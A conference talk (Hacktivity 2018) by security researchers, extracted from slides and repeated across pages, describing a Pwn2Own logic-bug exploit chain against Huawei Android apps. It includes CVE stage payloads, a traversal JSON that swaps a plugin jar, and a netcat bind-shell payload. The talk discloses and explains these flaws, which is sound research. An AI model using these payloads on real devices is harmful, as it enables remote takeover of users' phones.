Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper...

54
++ Android Pwn2Owning Hacktivity 2018

Transcript of Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper...

Page 1: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

++

Android Pwn2Owning

Hacktivity 2018

PUBLIC

Introduction

Agenda

bull Background

bull Bug Hunting Approach

bull Tooling Automation

bull Mobile Pwn2Own 2017 Vulnerabilities

bull Demo

2

About us

bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily

focused on VR and reverse engineering (as well as herding other researchers)

bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR

primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)

3

Background

bull How hard can it be

4

PWN2OWN 2017

5

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 2: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

PUBLIC

Introduction

Agenda

bull Background

bull Bug Hunting Approach

bull Tooling Automation

bull Mobile Pwn2Own 2017 Vulnerabilities

bull Demo

2

About us

bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily

focused on VR and reverse engineering (as well as herding other researchers)

bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR

primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)

3

Background

bull How hard can it be

4

PWN2OWN 2017

5

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast

1amazonawscom4aaaaaa9q84q87reertw35wy5testzip

DownloadUrlhttpss3-ap-northeast-

1amazonawscomk4aaaaaaertw35wy5testzipVersion2

windowZhangYueJSdo_command(json)

Stage 3

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

File Write

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

45

public boolean onChapPack(JSONObject arg10)

boolean v0_2

try int v3 = arg10getInt(StartIndex)

int v4 = arg10getInt(EndIndex)

String v2 = arg10getString(Price)

int v1 = arg10getInt(BookId)

String v5 = arg10getString(PayURL)

String v0_1 = arg10getString(DownloadURL)

String v7 = PATHgetBookDir() + arg10getString(FileName)

if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp

DevicegetNetType() = 0xFFFFFFFF)

FILEdelete(PATHgetBookCachePathNamePostfix(v7))

FILEdelete(v7)

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

46

public static String getBookNameCheckOpenFail(String arg2)

return PATHgetOpenFailDir() + MD5getMD5(arg2)

public static String getOpenFailDir()

return PATHgetWorkDir() + booksopenfail

Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)

47

5457bea93d0548a4d84357308df45322 =

pluginsDFServiceclassesjar

sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435

7308df45322

sdcardHWiReaderbookspluginsDFServiceclassesjar

Huawei Reader ndash Insecure Plugin Loading

48

public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception

return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null

arg4getClassLoader())loadClass(arg6)

protected final ArrayList P()

if(pR == null)

try PlatForm v3 = new PlatForm()

Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)

+

classesjar

comzhangyueiReaderPlugServiceDocFeature)newInstance()

v2setPlatform(((IPlatform)v3))

pR = ((IPlugDFService)v2)

Huawei Reader ndash Insecure Plugin Loading

49

function download_plugin()

documentwriteln(++ Downloading replacement classesjar ++)

It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2

windowZhangYueJSdo_command(json)

Huawei Reader ndash Payload Creation

50

package comzhangyueiReaderPlugService

import androidutilLog

public class DocFeature

public DocFeature()

comzhangyueiReaderPlugServiceDocFeature

Loge(ATTACKERRUNNING ARBITRARY CODE)

String cmd = datadatacomhuaweihwireaderbusybox

nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh

try

RuntimegetRuntime()exec(cmd)

catch (IOException e)

eprintStackTrace()

Demo

51

Questions

52

Credits

bull Georgi Geshev Rob Miller -

httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-

chrome-on-androidnew-blog-post

53

Whitepaper

54

bull Full whitepaper can be found on the MWR Labs website

(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)

PUBLIC

Page 3: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz

Agenda

bull Background

bull Bug Hunting Approach

bull Tooling Automation

bull Mobile Pwn2Own 2017 Vulnerabilities

bull Demo

2

About us

bull James Loureiro (NerdKernel) ndash Head of Security Research MWR primarily

focused on VR and reverse engineering (as well as herding other researchers)

bull Alex Plaskett (alexjplaskett) ndash Offensive security researcher MWR

primarily doing VR (WP7 jailbreak Pwn2Own Safari 2018 mobile security)

3

Background

bull How hard can it be

4

PWN2OWN 2017

5

Huawei Mate 9 Pro

6

PWN2OWN

Execute arbitrary instructionshellip

hellipretrieve sensitive informationhellip

hellipa full sandbox escape is requiredhellip

hellipwithout any user interaction

8

Pwn2Own Categories and Choice

9

PWN2OWN ndash Results

10

PUBLIC

Bug Hunting Approach

Browser attack surface

12

Exploit Mitigation Advancement

bull Memory Safety Mitigations

ndash ASLR PIE RELTO PartitionAlloc

bull Means you need mitigation bypass vulnerabilities too

bull Time consuming debugging memory corruption exploits on a real device

13

Attackers - Positives of Logic Bug Chains

bull Often design issues

ndash Hard to fix (long bug lives)

ndash Increased reliability

bull Architectural agnostic

ndash No problems with shellcode

bull Android IPC specifically is complex as hell

bull Harder to detect

14

Attackers - Negatives of Logic Bug Chains

bull They can get ridiculously long (11 Bugs in S8)

ndash One bug gets fixed and the whole chain is screwed

ndash Usually not particularly stealthy

Samsung phone rebooted

Huawei phone switches apps twice

bull Often requires a deeper understanding of the application

bull Automated detection is harder ndash how do you fuzz for logic bugs

15

Bug Hunting Tips

bull How too prioritise

ndash External Attack Surface (Reachable from browser)

ndash Permissions

Less of an issue for initial foothold

ndash Dangerous words

16

bull Want to rapidly find high risk issues in a large amount of apps

PUBLIC

Tooling and Automation

Toolset (Static vs Dynamic)

bull Android What do we care about

ndash BROWSABLE intents (Need to be web accessible) and Intents

ndash Content we can load into the applications (either via a WebView or Media)

ndash Controlled file writes reads

ndash Unsafe class loading

18

Increasing the attack surface

How do we get more things accessible

bull Intent Proxy Bugs

bull MITM stuff (SSL weaknesses)

19

Intent Proxy Example

bull Android Vendingbull LaunchUrlHandlerActivity

bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)

Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)

hellipif((v5) ampamp (v12))

v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1

hellip

Toolset (Static Analysis)

bull Rezord (internal) ndash Mass de-compilation of all apps

bull JEB

bull Grep

21

lsquoJandroidrsquo ndash Static analysis

22

lsquoJandroidrsquo ndash Static analysis

23

lsquoJandroidrsquo ndash Static analysis

bull For more info see Chainspotting Building Exploit Chains with Logic Bugs

slides

httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20

-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf

24

Dynamic Analysis Toolset

Global Hook Flexible Requires Root Lightweight

Xposed

Frida

bull Xposedbull Early injection (Zygote)

bull Global hooks across multiple applications

bull Fridabull Quick and easy prototyping

bull Debugging and dynamic analysis of obfuscated code

PUBLIC

Vulnerabilities

Building an Exploit Chain

bull So what do we need to dobull Assuming no memory corruption

bull BROWSABLE Intent URI handler etc

Browse to Website on

Device

Code Exec and Profit

HiApp ndash Huawei Market Place (App Gallery)

29

HiApp ndash Whitelist Bypass (CVE-2018-7931)

30

ltactivity androidconfigChanges=orientation|screenSize

androidlaunchMode=singleTopldquo

androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi

vity androidtheme=styleloading_activity_stylegt

ltintent-filtergt

ltaction androidname=androidintentactionVIEW gt

ltcategory androidname=androidintentcategoryDEFAULT gt

ltcategory androidname=androidintentcategoryBROWSABLE gt

ltdata androidhost=details androidscheme=appmarket gt

ltdata androidhost=search androidscheme=market gt

ltdata androidhost=avmallcom androidscheme=https gt

ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt

HiApp ndash Whitelist Bypass (CVE-2018-7931)

31

public List b()

if(ba(thisa))

thisa = new ArrayList()

thisaclear()

thisaadd(hicloudcom$)

thisaadd(vmallcom$)

thisaadd(huaweicom$)

Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()

do If(v1hasNext()) if(v1next()booleanValue()) continue

HiApp ndash stage1html (CVE-2018-7931)

32

documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1

Stage 1

Browse to Website on

Device

BROWSABLE Intent-

WebView

Code Exec and Profit

HiApp ndash JavaScript Bridge (CVE-2018-7932)

34

thiswebviewgetSettings()setJavaScriptEnabled(true)

thiswebviewrequestFocus()

thiswebviewsetWebViewClient(new InternalWebViewClient(this))

thiswebviewsetWebChromeClient(new

MarketWebChromeClient(this))

thiswebviewgetSettings()setBlockNetworkImage(true)

thiswebviewaddJavascriptInterface(new

HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)

HiApp ndash JavaScript Bridge (CVE-2018-7932)

35

JavascriptInterface public void launchApp(String arg7 String

arg8)

URISyntaxException v1_1

v0_1 = IntentparseUri(arg8 0)

try v0_1setPackage(arg7)

thismActivitystartActivity(v0_1)

android-app URI Schema

36

httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco

ntentIntentjava

android-apppackage_id[scheme[host[path]]][Intent]

android-

appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=

100Ssome_str=helloend

Action comexampleMY_ACTION

Package comexampleapp

Extras some_int=(int)100 some_str=(String)hello

HiApp ndash stage2html (CVE-2018-7932)

37

var pkg = comhuaweihwireader

var uri =

androidapphttpwwwgooglecoukIntentcomponent=comh

uaweihwireadercomzhangyueiReaderonlineuiActivityWeba

ction=comhuaweihwireaderSHOW_DETAILSurl=http192

16813718000stage3htmlend

windowHiSpaceObjectlaunchApp(pkguri)

Stage 2

Browse to Website on

Device

BROWSABLE Intent-

WebView

Exported Intent -

WebView

Code Exec and Profit

Huawei Reader Application

39

Huawei Reader ndash Input Validation (CVE-2017-15308)

40

protected void onCreate(Bundle arg8)

CharSequence v0_1

String v0

CharSequence v1 = null

superonCreate(arg8)

Intent v2 = thisgetIntent()

if(v2 = null) Uri v3 = v2getData()

if(v3 = null) v0 = v3getScheme()

else v0_1 = v1

v0 = v2getStringExtra(url)

if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)

Huawei Reader ndash Input Validation (CVE-2017-15308)

41

JavascriptInterface public void do_command(String arg9)

String v4 = ((JSONObject)v2_3)getString(Action)

LOGI(js actionName + v4)

JSONObject v5 =

((JSONObject)v2_3)getJSONObject(Data)

if(v4equalsIgnoreCase(onlineReader))

JSProtocolmJSBookProtocolonline(v5) return

if(v4equalsIgnoreCase(readNow))

JSProtocolmJSBookProtocolreadNow(v5) return

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

42

public void originalDownload(JSONObject arg19 boolean

arg20 boolean arg21)

v8 = 0

v10 = v4

v4_1 = 0

try

int v13 = v7getInt(Type)

v14 = v7optInt(Version)

v15 = v7optBoolean(getDrmAuth true)

v3 = PATHgetBookDir() + v7getString(FileName)

v2 = v7getInt(FileId)

v6 = v7getString(DownloadUrl)

Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)

43

function download_plugin()

var json =

ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180

01aaaaaPrice0

DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu

ginsDFServiceclassesjar

